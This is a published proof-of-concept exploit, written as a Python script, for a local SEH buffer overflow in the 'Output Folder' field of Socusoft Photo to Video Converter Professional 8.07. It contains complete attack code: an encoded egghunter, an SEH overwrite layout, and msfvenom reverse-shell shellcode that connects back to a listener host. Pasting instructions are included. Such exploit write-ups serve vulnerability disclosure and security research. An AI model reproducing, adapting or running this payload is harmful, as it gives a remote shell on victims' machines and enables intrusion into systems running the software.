
Socusoft Photo to Video Converter Professional 8.07 – ‘Output Folder’ Buffer Overflow (SEH Egghunter)



# Exploit Title: Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-23
# Exploit Author: MasterVlad
# Vendor Homepage: http://www.dvd-photo-slideshow.com/photo-to-video-converter.html
# Software Link: https://www.exploit-db.com/apps/ea1720441edd5990a9d0d1ed564a507e-photo-to-video-pro.exe
# Version: 8.07
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 10 x64

# Proof of Concept:

# 1. Run the python script
# 2. Open exploit.txt in an editor that preserves raw control bytes (the egghunter stub contains \x01, \x05, \x09 and similar) and copy the whole content to the clipboard
# 3. Open Socusoft Photo to Video Converter Professional 8.07 and go to Video Output
# 4. Paste the clipboard into the 'Output Folder' field and click on Open

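#!/usr/bin/python

# Badchars: \x22, \x2a, \x3a, \x3c, \x3e, \x3f, \x7c + Non-ascii
#   (and the usual \x00, \x0a, \x0d). Decoded, those are  " * : < > ? |  --
#   exactly the characters Windows rejects in a path, which fits an
#   'Output Folder' field that is path-validated before it overflows.

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x22\x2a\x3a\x3c\x3e\x3f\x7c" -f py -e x86/alpha_mixed BufferRegister=EDI
#
# NOTE: the listener address and port are baked into SHELLCODE below.
# Regenerate the blob with your own LHOST/LPORT (same -b and -e options)
# before use. BufferRegister=EDI: the alpha_mixed decoder relies on EDI
# pointing at the start of the blob when it gets control -- the egghunter
# is presumably expected to leave EDI there after matching the tag (not
# verified here).

# Bytes that must not appear anywhere in the pasted payload.
BADCHARS = b"\x00\x0a\x0d\x22\x2a\x3a\x3c\x3e\x3f\x7c"

# alpha_mixed-encoded reverse shell (702 bytes, all printable ASCII).
# Leading \x57\x59 is "push edi / pop edi" style register setup emitted
# for BufferRegister=EDI.
SHELLCODE = (
    b"\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
    b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
    b"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x4b\x4c\x49\x78\x6d\x52\x55\x50\x65\x50\x37\x70\x53"
    b"\x50\x6b\x39\x48\x65\x54\x71\x4b\x70\x45\x34\x6c\x4b"
    b"\x52\x70\x44\x70\x6e\x6b\x52\x72\x54\x4c\x6c\x4b\x42"
    b"\x72\x66\x74\x4e\x6b\x72\x52\x65\x78\x46\x6f\x6c\x77"
    b"\x52\x6a\x74\x66\x45\x61\x6b\x4f\x6e\x4c\x45\x6c\x45"
    b"\x31\x33\x4c\x55\x52\x34\x6c\x51\x30\x4f\x31\x4a\x6f"
    b"\x54\x4d\x46\x61\x39\x57\x5a\x42\x48\x72\x32\x72\x52"
    b"\x77\x6c\x4b\x30\x52\x32\x30\x4c\x4b\x72\x6a\x45\x6c"
    b"\x6e\x6b\x52\x6c\x42\x31\x42\x58\x79\x73\x57\x38\x76"
    b"\x61\x4e\x31\x32\x71\x4c\x4b\x63\x69\x31\x30\x33\x31"
    b"\x58\x53\x6e\x6b\x52\x69\x34\x58\x4b\x53\x64\x7a\x30"
    b"\x49\x4e\x6b\x36\x54\x4e\x6b\x63\x31\x69\x46\x55\x61"
    b"\x79\x6f\x4e\x4c\x4b\x71\x7a\x6f\x54\x4d\x46\x61\x78"
    b"\x47\x55\x68\x39\x70\x31\x65\x39\x66\x74\x43\x53\x4d"
    b"\x59\x68\x47\x4b\x51\x6d\x66\x44\x61\x65\x78\x64\x56"
    b"\x38\x6e\x6b\x61\x48\x37\x54\x76\x61\x6b\x63\x31\x76"
    b"\x4c\x4b\x66\x6c\x72\x6b\x4e\x6b\x71\x48\x35\x4c\x33"
    b"\x31\x68\x53\x6e\x6b\x75\x54\x4c\x4b\x56\x61\x6a\x70"
    b"\x6c\x49\x32\x64\x74\x64\x44\x64\x73\x6b\x31\x4b\x70"
    b"\x61\x53\x69\x30\x5a\x63\x61\x6b\x4f\x49\x70\x33\x6f"
    b"\x31\x4f\x31\x4a\x4c\x4b\x37\x62\x48\x6b\x4e\x6d\x63"
    b"\x6d\x31\x78\x45\x63\x44\x72\x57\x70\x57\x70\x42\x48"
    b"\x30\x77\x44\x33\x45\x62\x33\x6f\x33\x64\x30\x68\x50"
    b"\x4c\x34\x37\x44\x66\x53\x37\x79\x6f\x68\x55\x4e\x58"
    b"\x6a\x30\x63\x31\x53\x30\x33\x30\x75\x79\x68\x44\x42"
    b"\x74\x46\x30\x71\x78\x71\x39\x6d\x50\x42\x4b\x77\x70"
    b"\x79\x6f\x59\x45\x62\x70\x56\x30\x76\x30\x32\x70\x37"
    b"\x30\x56\x30\x31\x50\x66\x30\x53\x58\x78\x6a\x76\x6f"
    b"\x49\x4f\x6b\x50\x6b\x4f\x6e\x35\x6c\x57\x33\x5a\x34"
    b"\x45\x61\x78\x59\x50\x4f\x58\x39\x34\x6e\x61\x70\x68"
    b"\x75\x52\x67\x70\x63\x31\x6f\x4b\x6d\x59\x6a\x46\x61"
    b"\x7a\x56\x70\x62\x76\x73\x67\x53\x58\x6d\x49\x69\x35"
    b"\x64\x34\x43\x51\x69\x6f\x6e\x35\x6b\x35\x4b\x70\x72"
    b"\x54\x76\x6c\x39\x6f\x62\x6e\x65\x58\x64\x35\x6a\x4c"
    b"\x55\x38\x5a\x50\x4e\x55\x4c\x62\x30\x56\x4b\x4f\x4a"
    b"\x75\x63\x58\x70\x63\x50\x6d\x70\x64\x47\x70\x6b\x39"
    b"\x6b\x53\x43\x67\x51\x47\x62\x77\x45\x61\x6a\x56\x43"
    b"\x5a\x46\x72\x32\x79\x43\x66\x39\x72\x79\x6d\x61\x76"
    b"\x4b\x77\x61\x54\x76\x44\x55\x6c\x66\x61\x63\x31\x6e"
    b"\x6d\x43\x74\x76\x44\x74\x50\x4b\x76\x45\x50\x32\x64"
    b"\x71\x44\x52\x70\x66\x36\x73\x66\x30\x56\x52\x66\x31"
    b"\x46\x42\x6e\x62\x76\x51\x46\x43\x63\x73\x66\x71\x78"
    b"\x50\x79\x38\x4c\x67\x4f\x4e\x66\x6b\x4f\x69\x45\x6c"
    b"\x49\x6b\x50\x42\x6e\x63\x66\x42\x66\x59\x6f\x64\x70"
    b"\x70\x68\x36\x68\x6d\x57\x75\x4d\x51\x70\x79\x6f\x58"
    b"\x55\x6d\x6b\x5a\x50\x48\x35\x4e\x42\x76\x36\x52\x48"
    b"\x4d\x76\x4f\x65\x4d\x6d\x6f\x6d\x79\x6f\x4a\x75\x57"
    b"\x4c\x77\x76\x71\x6c\x57\x7a\x4d\x50\x69\x6b\x69\x70"
    b"\x31\x65\x65\x55\x4f\x4b\x72\x67\x67\x63\x31\x62\x72"
    b"\x4f\x53\x5a\x75\x50\x72\x73\x6b\x4f\x5a\x75\x41\x41"
)

# Hand "sub-encoded" egghunter (196 bytes), kept inside the badchar set.
# Every group starts with AND EAX,0x544E4D4A / AND EAX,0x2B313235 -- the
# two masks share no bits, so EAX becomes 0 -- then one to three
# SUB EAX,imm32 build a 4-byte chunk of the real hunter and PUSH EAX
# writes it to the stack. The very first group instead does
# push esp / pop eax / add ax,0x92c / push eax / pop esp to move ESP so
# the decoded hunter lands just past this stub; execution presumably
# falls through into it once all chunks are pushed (not verified here).
EGGHUNTER = (
    b"\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x2C\x09\x50\x5c"
    b"\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
    b"\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
    b"\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
    b"\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
    b"\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
    b"\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
    b"\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
    b"\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
)

# Marker the hunter scans memory for; it is doubled in front of SHELLCODE.
EGG_TAG = b"T00W"

# Offset of the SEH record from the start of the 'Output Folder' input.
SEH_OFFSET = 304
# nSEH: "je +6 / jne +4" -- both branches land at offset 312, i.e. they
# skip over the 4-byte handler address straight into EGGHUNTER.
NSEH = b"\x74\x06\x75\x04"
# SEH handler = 0x10047a1e (little-endian). Presumably a pop/pop/ret
# gadget, as the SEH technique needs; its module is not recorded here,
# so confirm it is non-SafeSEH / non-ASLR before reusing on another build.
SEH = b"\x1e\x7a\x04\x10"
# Size of the first stage (filler + SEH record + hunter + "B" padding).
STAGE1_SIZE = 2000


def build_exploit():
    """Return the complete 'Output Folder' payload as bytes.

    Layout (offsets into the returned buffer):
        0      "A" * 304            filler up to the SEH record
        304    NSEH                 short-jump pair over the handler
        308    SEH                  0x10047a1e
        312    EGGHUNTER            sub-encoded hunter
        508    "B" * 1492           pads the first stage to 2000 bytes
        2000   EGG_TAG * 2          "T00WT00W"
        2008   SHELLCODE

    Raises ValueError if the hunter no longer fits in the first stage or
    if any byte from BADCHARS ends up in the payload -- a paste that
    contains one of them would be truncated or rejected by the field.
    """
    padding = STAGE1_SIZE - SEH_OFFSET - len(NSEH) - len(SEH) - len(EGGHUNTER)
    if padding < 0:
        raise ValueError("egghunter does not fit in the first stage")
    stage1 = b"A" * SEH_OFFSET + NSEH + SEH + EGGHUNTER + b"B" * padding
    payload = stage1 + EGG_TAG * 2 + SHELLCODE
    # Sanity check: the badchar list is what the encoder was told; make
    # sure the hand-written parts (hunter, SEH bytes) respect it too.
    bad = [c for c in BADCHARS if c in payload]
    if bad:
        raise ValueError("payload contains bad characters: %r" % (bad,))
    return payload


if __name__ == "__main__":
    # Binary mode: the payload is raw bytes (control characters included),
    # so no newline or encoding translation must be applied.
    with open("exploit.txt", "wb") as fh:
        fh.write(build_exploit())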
            




